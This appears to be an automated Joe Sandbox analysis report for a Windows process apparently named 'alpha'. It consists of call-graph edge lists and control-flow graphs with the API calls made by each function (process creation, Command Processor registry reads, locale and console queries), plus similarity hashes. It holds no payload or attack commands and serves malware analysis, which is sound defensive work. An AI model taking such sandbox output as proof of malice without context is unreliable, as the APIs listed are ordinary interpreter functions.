20583 ee5e68 20568->20583 20573 f08959 449 API calls 20569->20573 20590 ef2b8c 20569->20590 20570->20574 20579 ef2ad7 20570->20579 20571->20559 20576 ef2b34 20571->20576 20572 eff4d2 20575 f09922 448 API calls 20572->20575 20577 eff50f 20573->20577 20574->20555 20574->20556 20574->20565 20574->20566 20574->20572 20581 f08959 449 API calls 20574->20581 20578 eff4d7 longjmp 20575->20578 20630 ef2c23 20576->20630 20577->20577 20578->20579 20579->20556 20584 f08959 449 API calls 20579->20584 20581->20574 20582 ef2b4b 20634 ef33ca 20582->20634 20583->20433 20584->20556 20590->20433 20592 eecc70 548 API calls 20591->20592 20593 eea93b 20592->20593 20594 eea942 20593->20594 20596 f08959 449 API calls 20593->20596 20595 eedcd0 448 API calls 20594->20595 20597 eea94f 20594->20597 20595->20597 20596->20594 20598 eea959 20597->20598 20599 f09922 448 API calls 20597->20599 20598->20514 20600 ef9cac longjmp 20599->20600 20604 ee5e22 20600->20604 20601 ee5e1d 20601->20514 20602 ee5da6 448 API calls 20602->20604 20603 ee8f21 448 API calls 20603->20604 20604->20601 20604->20602 20604->20603 20605 ee5e61 20604->20605 20606 f08c50 448 API calls 20605->20606 20607 ee5e68 20606->20607 20607->20514 20609 eedcd0 448 API calls 20608->20609 20610 eebba1 20609->20610 20611 eedcd0 448 API calls 20610->20611 20614 eebbc1 20610->20614 20611->20614 20612 f09922 448 API calls 20613 ef9cac longjmp 20612->20613 20619 ee5e22 20613->20619 20614->20612 20616 eebbde 20614->20616 20615 ee5e1d 20615->20537 20616->20537 20617 ee5da6 448 API calls 20617->20619 20618 ee8f21 448 API calls 20618->20619 20619->20615 20619->20617 20619->20618 20620 ee5e61 20619->20620 20621 f08c50 448 API calls 20620->20621 20622 ee5e68 20621->20622 20622->20537 20624 eebc30 448 API calls 20623->20624 20625 ee9938 20624->20625 20654 eea800 20625->20654 20628 ef6b30 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 20629 ee994e 20628->20629 20629->20574 20631 eecc70 548 API calls 20630->20631 20632 ef2c2f _wcsicmp 
20631->20632 20633 ef2c41 20632->20633 20633->20582 20635 eecc70 548 API calls 20634->20635 20636 ef33e2 20635->20636 20637 eff776 20636->20637 20645 ef33eb 20636->20645 20638 f08959 449 API calls 20637->20638 20639 eff77b 20638->20639 20640 eecc70 548 API calls 20640->20645 20642 ef3457 20645->20639 20645->20640 20645->20642 20646 eedd20 448 API calls 20645->20646 20647 eedcd0 448 API calls 20645->20647 20648 eff78c 20645->20648 20646->20645 20647->20645 20655 ee9943 20654->20655 20656 eea82f 20654->20656 20655->20628 20656->20655 20656->20656 20657 f09a0e 449 API calls 20656->20657 20658 efc971 20657->20658 20658->20655 20659 ee63bd 448 API calls 20658->20659 20665 eed613 20664->20665 20666 eed660 532 API calls 20665->20666 20668 eed627 20665->20668 20667 ef80cd 20666->20667 20667->20451 20668->20451 20670 eedcd0 448 API calls 20669->20670 20671 eeda45 20670->20671 20672 efd948 memset longjmp 20671->20672 20686 eeda52 20671->20686 20673 eeda81 20672->20673 20673->20311 20674 eedad3 20675 efd9ad 20674->20675 20676 eedaf1 20674->20676 20679 ee78e4 448 API calls 20675->20679 20677 eedc60 2 API calls 20676->20677 20678 eedaf6 20677->20678 20678->20311 20680 efd9a8 20679->20680 20683 eedc60 2 API calls 20680->20683 20684 efd9cc longjmp 20683->20684 20685 efd9da 20684->20685 20687 ee78e4 448 API calls 20685->20687 20686->20673 20686->20674 20686->20675 20689 efd97b memcpy 20686->20689 20738 eeee03 20686->20738 20789 eebf70 20686->20789 20688 efd9e3 20687->20688 20688->20311 20690 ee78e4 448 API calls 20689->20690 20690->20680 20692 f07728 20691->20692 20693 f076fd 20691->20693 20695 f07d26 20692->20695 20698 f07746 20692->20698 20700 ee9950 448 API calls 20692->20700 20694 ee63bd 448 API calls 20693->20694 20697 f07708 EnterCriticalSection LeaveCriticalSection 20694->20697 20696 ef6b30 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 20695->20696 20699 f07d3d 20696->20699 20697->20692 20701 eeec2e 448 API calls 20698->20701 20702 f07750 20698->20702 20699->20304 
20700->20698 20701->20702 20703 ee8e9e 448 API calls 20702->20703 20704 f077ad 20703->20704 20843 f07654 20704->20843 20707 f07c99 20708 ee9abf _vsnwprintf 20707->20708 20709 f07cba 20708->20709 20711 ee998d 448 API calls 20709->20711 20710 f078b8 towupper 20719 f077fa 20710->20719 20712 f07cfe 20711->20712 20712->20695 20713 f07d07 EnterCriticalSection LeaveCriticalSection 20712->20713 20713->20695 20714 ee9310 448 API calls 20714->20719 20715 ee6854 448 API calls 20715->20719 20716 ee4d08 4 API calls 20716->20719 20717 f07afc GetDriveTypeW 20717->20719 20719->20709 20719->20710 20719->20714 20719->20715 20719->20716 20719->20717 20720 ee9abf _vsnwprintf 20719->20720 20721 ef72ef ApiSetQueryApiSetPresence 20719->20721 20723 ee9abf _vsnwprintf 20719->20723 20847 ef640a FormatMessageW 20719->20847 20722 f079ed LocalFree 20720->20722 20721->20719 20722->20719 20723->20719 20724->20310 20726 f04799 448 API calls 20725->20726 20727 f0763c 20726->20727 20728 f07649 GetLastError 20727->20728 20729 f07645 20727->20729 20728->20729 20729->20325 20731 f0a0ef GetStdHandle 20730->20731 20732 f04799 448 API calls 20731->20732 20733 f0a110 20732->20733 20734 f0a114 wcschr 20733->20734 20735 f0a129 20733->20735 20734->20731 20734->20735 20736 ef6b30 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 20735->20736 20737 f0a133 20736->20737 20737->20368 20739 eeee4c 20738->20739 20740 eeee52 20738->20740 20739->20740 20743 eeeea7 20739->20743 20741 eeee5a wcsrchr 20740->20741 20742 eeee68 20740->20742 20741->20742 20745 ef6b30 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 20742->20745 20746 ef1a05 5 API calls 20743->20746 20750 efde31 20743->20750 20744 efde3f 20744->20742 20748 efde49 ??_V@YAXPAX 20744->20748 20749 eeee88 20745->20749 20775 eeeed8 20746->20775 20747 efdf50 longjmp 20747->20750 20748->20742 20749->20686 20750->20744 20750->20747 20750->20748 20751 eeef09 towlower wcsrchr 20754 eef1dd wcsrchr 20751->20754 20751->20775 20752 eeef50 wcsrchr 20755 eeef67 
wcsrchr 20752->20755 20752->20775 20753 efde80 wcschr 20756 efde9e 20753->20756 20757 efdf01 20753->20757 20758 eef1f7 towlower 20754->20758 20754->20775 20755->20757 20755->20775 20759 eedcd0 448 API calls 20756->20759 20757->20748 20760 ee78e4 448 API calls 20757->20760 20758->20775 20763 efdeb5 20759->20763 20760->20750 20761 eeacb0 448 API calls 20761->20775 20762 eeefed 20762->20742 20764 eeefef ??_V@YAXPAX 20762->20764 20763->20750 20812 ef1d90 20763->20812 20764->20742 20766 eeefe6 20769 eeacb0 448 API calls 20766->20769 20767 eef009 GetFullPathNameW 20767->20775 20769->20762 20770 eedc60 2 API calls 20770->20757 20771 efdf72 SearchPathW 20771->20775 20772 ef0207 10 API calls 20773 eef03d wcsrchr 20772->20773 20774 efdfb9 wcsrchr 20773->20774 20773->20775 20774->20775 20775->20748 20775->20750 20775->20751 20775->20752 20775->20753 20775->20757 20775->20761 20775->20762 20775->20766 20775->20767 20775->20771 20775->20772 20775->20774 20776 eef067 memset 20775->20776 20778 efdff6 GetFileAttributesExW 20775->20778 20779 eef18a 20775->20779 20780 efe07c FileTimeToSystemTime 20775->20780 20785 ee6854 448 API calls 20775->20785 20787 eef164 wcsrchr 20775->20787 20788 ee9310 448 API calls 20775->20788 20825 f0b325 20775->20825 20777 eee3f0 17 API calls 20776->20777 20777->20775 20778->20775 20781 eeacb0 448 API calls 20779->20781 20783 efe271 20779->20783 20780->20775 20782 eef1ba 20781->20782 20782->20762 20784 eef1c8 ??_V@YAXPAX 20782->20784 20784->20762 20785->20775 20787->20775 20787->20783 20788->20775 20790 eedcd0 448 API calls 20789->20790 20792 eebfc8 20790->20792 20791 efcfad longjmp 20796 eec02c 20791->20796 20794 eedcd0 448 API calls 20792->20794 20792->20796 20797 eec155 20792->20797 20793 efcfc1 longjmp 20793->20796 20794->20796 20795 eeec2e 448 API calls 20795->20796 20796->20791 20796->20793 20796->20795 20796->20797 20800 eec1ef wcstol 20796->20800 20801 eec111 20796->20801 20809 eec26d 20796->20809 20810 eec0bf 20796->20810 20797->20797 20802 
efd042 memcpy 20797->20802 20803 eec333 memcpy 20797->20803 20806 eec1b2 _wcsnicmp 20797->20806 20797->20810 20800->20796 20801->20797 20804 efd029 20801->20804 20805 efd063 20802->20805 20803->20806 20807 ee78e4 448 API calls 20804->20807 20806->20797 20808 efd036 longjmp 20807->20808 20808->20802 20809->20797 20811 eec27d wcstol 20809->20811 20838 eec3f4 20810->20838 20811->20797 20813 ef1da8 20812->20813 20814 ef1e5a 20812->20814 20813->20814 20833 eeab7f 20813->20833 20814->20770 20817 eeacb0 448 API calls 20818 ef1dc2 20817->20818 20819 ef01f5 wcsrchr 20818->20819 20824 ef1dd1 20819->20824 20820 eff106 20821 ef1e4a 20823 eedc60 2 API calls 20821->20823 20822 ef1e11 _wcsnicmp 20822->20824 20823->20814 20824->20820 20824->20821 20824->20822 20824->20824 20828 f0b35b __aulldvrm 20825->20828 20826 f0b42e 20827 f0b445 wcsncmp 20826->20827 20830 f0b432 20826->20830 20827->20830 20828->20826 20829 f0b3f4 memmove 20828->20829 20829->20828 20831 ef6b30 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 20830->20831 20832 f0b4f8 20831->20832 20832->20775 20836 eeabaa 20833->20836 20837 eeab88 20833->20837 20834 eeab89 iswspace 20835 eeab98 wcschr 20834->20835 20834->20837 20835->20836 20835->20837 20836->20817 20837->20834 20837->20835 20837->20836 20839 eedc60 2 API calls 20838->20839 20840 eec3fb 20839->20840 20841 eedc60 2 API calls 20840->20841 20842 eec0df 20841->20842 20842->20686 20844 f07660 20843->20844 20845 f07679 20843->20845 20846 ef6e25 4 API calls 20844->20846 20845->20695 20845->20707 20845->20719 20846->20845 20847->20719 20849 f08727 20848->20849 20854 f08781 20848->20854 20850 ee998d 448 API calls 20849->20850 20853 f08736 20850->20853 20851 ee9950 448 API calls 20851->20853 20852 ee998d 448 API calls 20852->20853 20853->20851 20853->20852 20853->20854 20856 ee9950 448 API calls 20855->20856 20857 f086f9 20856->20857 20858 f0871d 448 API calls 20857->20858 20859 f08702 20858->20859 20860 f08791 448 API calls 20859->20860 20861 f0870d 20860->20861 
[Call-graph edge list, continued from the preceding section and rendered from the interactive graph widget. Nodes 20862 through 22583 cover functions at addresses ee59a0 through f0a53d. Each entry is a node id, a function address and, where resolved, the API names or an "<n> API calls" summary, followed by src->dst edges; in text form it is usable only as an API inventory. The Windows and CRT symbols named in this part of the graph are:

  Process creation: InitializeProcThreadAttributeList, UpdateProcThreadAttribute, DeleteProcThreadAttributeList, GetStartupInfoW, CreateProcessW, CreateProcessAsUserW, _wpopen, _pclose, exit
  Token and handle: NtOpenProcessToken, NtQueryInformationToken, NtClose, CloseHandle, ApiSetQueryApiSetPresence
  Console: GetConsoleTitleW, SetConsoleTitleW, SetConsoleMode
  File, path and volume: CreateFileW, ReadFile, SetFilePointer, GetFileType, GetFileSize, GetFileAttributesW, SearchPathW, GetFullPathNameW, GetDriveTypeW, GetVolumeInformationW, FindFirstFileW, FindNextFileW, FindClose, GetEnvironmentVariableW, AcquireSRWLockShared, ReleaseSRWLockShared, GetProcessHeap, RtlFreeHeap, GetLastError
  CRT and string handling: memset, memcmp, memmove, realloc, wcschr, wcsrchr, wcsncmp, _wcsicmp, _wcsnicmp, lstrcmpW, lstrcmpiW, towupper, iswdigit, iswspace, wcstol, _vsnwprintf, fprintf, fgets, feof, ferror, __iob_func, _get_osfhandle, _dup, _dup2, _close, MultiByteToWideChar, WideCharToMultiByte, _setjmp3, longjmp, _local_unwind4, operator new (nothrow) and operator delete[] (??2@YAPAXIABUnothrow_t@std@@@Z, ??_V@YAXPAX)]

Control-flow Graph

• Executed
• Not Executed
[Control-flow graph for the function at ee8572, rendered from the interactive graph widget: fourteen basic blocks (ee8572 through ee8763) each calling GetLocaleInfoW, the first also calling ee8791, ending at block ee8769-ee8786 with setlocale and a call to ef6b30. Blocks efb2f9 through efb595 are the alternate branches taken from those blocks. The executed/not-executed colouring of the legend above is not preserved in the text rendering.]
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EE8791: GetUserDefaultLCID.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00EE6906,0000001F,?,00000080), ref: 00EE8791
                                                                                                                                                                                                                                                                                                                                                      • GetLocaleInfoW.KERNELBASE(00000000,0000001E,00F1C9E0,00000008), ref: 00EE859E
                                                                                                                                                                                                                                                                                                                                                      • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000023,?,00000080), ref: 00EE85BC
                                                                                                                                                                                                                                                                                                                                                      • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000021,?,00000080), ref: 00EE8614
                                                                                                                                                                                                                                                                                                                                                      • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000024,?,00000080), ref: 00EE8653
                                                                                                                                                                                                                                                                                                                                                      • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0000001D,00F1C9D0,00000008), ref: 00EE867D
                                                                                                                                                                                                                                                                                                                                                      • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000031,00F1C970,00000020), ref: 00EE8698
                                                                                                                                                                                                                                                                                                                                                      • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000032,00F1C930,00000020), ref: 00EE86B0
                                                                                                                                                                                                                                                                                                                                                      • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000033,00F1C8F0,00000020), ref: 00EE86C8
                                                                                                                                                                                                                                                                                                                                                      • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000034,00F1C8B0,00000020), ref: 00EE86E0
                                                                                                                                                                                                                                                                                                                                                      • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000035,00F1C870,00000020), ref: 00EE86F8
                                                                                                                                                                                                                                                                                                                                                      • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000036,00F1C830,00000020), ref: 00EE8710
                                                                                                                                                                                                                                                                                                                                                      • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000037,00F1C7F0,00000020), ref: 00EE8728
                                                                                                                                                                                                                                                                                                                                                      • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0000000E,00F1C9C0,00000008), ref: 00EE8743
                                                                                                                                                                                                                                                                                                                                                      • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0000000F,00F1C9B0,00000008), ref: 00EE875B
                                                                                                                                                                                                                                                                                                                                                      • setlocale.MSVCRT ref: 00EE8770
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: InfoLocale$DefaultUsersetlocale
                                                                                                                                                                                                                                                                                                                                                      • String ID: .OCP$Fri$MM/dd/yy$Mon$Sat$Sun$Thu$Tue$Wed$dd/MM/yy$yy/MM/dd
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 1351325837-2236139042
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 78ec07200899fd453fd130b2092a467927ae0ed91a6c941f6058417222a7ca24
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 6333f41f0c198b6afdea2de0473a7a649ea6674d240ac07b9ce8d757a8bb0c60
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 78ec07200899fd453fd130b2092a467927ae0ed91a6c941f6058417222a7ca24
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 61C1222170025E96DB304F36CE0977B37ADAF90758F24312AEA0AFB185EB64C941D760

                                                                                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                                                                                      control_flow_graph 833 ef0207-ef0236 834 ef0239-ef0242 833->834 834->834 835 ef0244-ef024a 834->835 836 ef037d 835->836 837 ef0250-ef0255 835->837 841 efe739-efe750 _wcsicmp 836->841 838 ef0259-ef0263 837->838 839 ef028c-ef02a9 FindFirstFileW 838->839 840 ef0265-ef0268 838->840 845 ef02af-ef02bf FindClose 839->845 846 efe798-efe79b 839->846 840->839 842 ef026a-ef0270 840->842 843 efe756-efe75d 841->843 844 ef02c5-ef02cf 841->844 842->838 848 ef0272-ef0289 call ef6b30 842->848 847 ef02d2-ef02dd 844->847 845->844 849 ef034d-ef0351 845->849 847->847 850 ef02df-ef02f7 847->850 849->843 851 ef0357-ef0372 _wcsnicmp 849->851 850->836 853 ef02fd-ef02ff 850->853 851->844 854 ef0378 851->854 856 ef0305-ef0348 memcpy call eef3a0 853->856 857 efe762-efe764 853->857 854->841 856->842 859 efe767-efe772 857->859 859->859 861 efe774-efe791 memmove 859->861 861->846
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • FindFirstFileW.KERNELBASE(?,?,00000000,00000000,00000000), ref: 00EF0297
                                                                                                                                                                                                                                                                                                                                                      • FindClose.KERNELBASE(00000000), ref: 00EF02B0
                                                                                                                                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,?), ref: 00EF0311
                                                                                                                                                                                                                                                                                                                                                      • _wcsnicmp.MSVCRT ref: 00EF0367
                                                                                                                                                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 00EFE746
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: Find$CloseFileFirst_wcsicmp_wcsnicmpmemcpy
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 242869866-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 4d7ec5449e85fb795fa48769c5bbe32a8a576a3ce29ffab64093834999a4a563
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: e3f5f76fdb0a7a0c937621f7bac635b6acc2a0c9b3ee309ec855ac8a578a7bda
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4d7ec5449e85fb795fa48769c5bbe32a8a576a3ce29ffab64093834999a4a563
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1A51C3756083058BC724DF28DC485BBB7E5EFC8314F54491EFA89A3291E731E905CB96

                                                                                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • GetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000,00000000,00EEA9C5), ref: 00EEA9D8
                                                                                                                                                                                                                                                                                                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,00000000,00000000), ref: 00EEA9F3
                                                                                                                                                                                                                                                                                                                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00EEA9FA
                                                                                                                                                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,00000000,00000000), ref: 00EEAA09
                                                                                                                                                                                                                                                                                                                                                      • FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000), ref: 00EEAA12
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: EnvironmentHeapStrings$AllocateFreeProcessmemcpy
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 429350006-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 1eadcfa16cf8abcc883b595aa7d1f91e8f37eacca142b6e6d7d6d106f9006c0c
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: cbaf85e0404c902eca0499886462bf858507e4e38785ed7c1d60c6d6dc4a5844
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1eadcfa16cf8abcc883b595aa7d1f91e8f37eacca142b6e6d7d6d106f9006c0c
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D6E0927760162827C231276A2C89C6F3A9EDBC8671B0A0034F909E3201DE348C139AB3
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNELBASE(Function_00016E70), ref: 00EF6EC5
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 3192549508-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 0fc44b8729dbf1ecef37b0d5db71997ea7ec346bd2e65f76600e08b46a39083e
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: c066d41f9b9e1b2e6042bef32d3f7bfd29ddf54589cd9615530a72f95ddb12a8
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0fc44b8729dbf1ecef37b0d5db71997ea7ec346bd2e65f76600e08b46a39083e
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 459002B52922088B961097719C0941576B15B486027815490E151D9054DB6441056526

Control-flow Graph
• Legend: Executed / Not Executed
• Function 00EE87CA-00EE8B4C (rendered graph not recoverable from the extracted text). Entry block 00EE87CA-00EE8870 calls InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, SetConsoleCtrlHandler, _get_osfhandle and GetConsoleMode (twice each), subcalls 00EEE310, 00EEA9D4, 00EE8B96 and 00EE8273, then GetCommandLineW. Later blocks call GetWindowsDirectoryW, GetConsoleOutputCP, GetCPInfo, GetProcessHeap/HeapAlloc, GetConsoleTitleW, GetStdHandle/GetConsoleScreenBufferInfo, GetModuleHandleW with three GetProcAddress resolutions, GlobalFree and free.
APIs
• InitializeCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(00F1CA04), ref: 00EE87EE
• EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00EE87FA
• LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00EE880E
• SetConsoleCtrlHandler.API-MS-WIN-CORE-CONSOLE-L1-1-0(00F07460,00000001), ref: 00EE881B
• _get_osfhandle.MSVCRT ref: 00EE8828
• GetConsoleMode.KERNELBASE(00000000), ref: 00EE8830
• _get_osfhandle.MSVCRT ref: 00EE883C
• GetConsoleMode.KERNELBASE(00000000), ref: 00EE8844
  • Part of subcall function 00EEE310: _get_osfhandle.MSVCRT ref: 00EEE318
  • Part of subcall function 00EEE310: SetConsoleMode.KERNELBASE(00000000), ref: 00EEE322
  • Part of subcall function 00EEE310: _get_osfhandle.MSVCRT ref: 00EEE32F
  • Part of subcall function 00EEE310: GetConsoleMode.KERNELBASE(00000000), ref: 00EEE339
  • Part of subcall function 00EEE310: _get_osfhandle.MSVCRT ref: 00EEE35E
  • Part of subcall function 00EEE310: GetConsoleMode.KERNELBASE(00000000), ref: 00EEE368
  • Part of subcall function 00EEE310: _get_osfhandle.MSVCRT ref: 00EEE390
  • Part of subcall function 00EEE310: SetConsoleMode.KERNELBASE(00000000), ref: 00EEE39A
  • Part of subcall function 00EEA9D4: GetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000,00000000,00EEA9C5), ref: 00EEA9D8
  • Part of subcall function 00EEA9D4: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,00000000,00000000), ref: 00EEA9F3
  • Part of subcall function 00EEA9D4: RtlAllocateHeap.NTDLL(00000000), ref: 00EEA9FA
  • Part of subcall function 00EEA9D4: memcpy.MSVCRT(00000000,00000000,00000000), ref: 00EEAA09
  • Part of subcall function 00EEA9D4: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000), ref: 00EEAA12
  • Part of subcall function 00EE8B96: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,00000004,?,00EE885E), ref: 00EE8B9D
  • Part of subcall function 00EE8B96: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00EE885E), ref: 00EE8BA4
  • Part of subcall function 00EE8273: RegOpenKeyExW.KERNELBASE(80000002,Software\Microsoft\Command Processor,00000000,02000000,?), ref: 00EE82D3
  • Part of subcall function 00EE8273: RegQueryValueExW.KERNELBASE(?,DisableUNCCheck,00000000,?,?,?), ref: 00EE8313
  • Part of subcall function 00EE8273: RegQueryValueExW.KERNELBASE(?,EnableExtensions,00000000,00000001,?,00001000), ref: 00EE834D
  • Part of subcall function 00EE8273: RegQueryValueExW.KERNELBASE(?,DelayedExpansion,00000000,00000001,?,00001000), ref: 00EE839D
  • Part of subcall function 00EE8273: RegQueryValueExW.KERNELBASE(?,DefaultColor,00000000,00000001,?,00001000), ref: 00EE83D7
• GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00EE886A
• GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00EE88A5
• GetWindowsDirectoryW.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,00000000,-00000105,00000000), ref: 00EE8987
• GetConsoleOutputCP.KERNELBASE(?,?,00000000,-00000105,00000000), ref: 00EE89AB
• GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00F1C9F0), ref: 00EE89BC
  • Part of subcall function 00EE8572: GetLocaleInfoW.KERNELBASE(00000000,0000001E,00F1C9E0,00000008), ref: 00EE859E
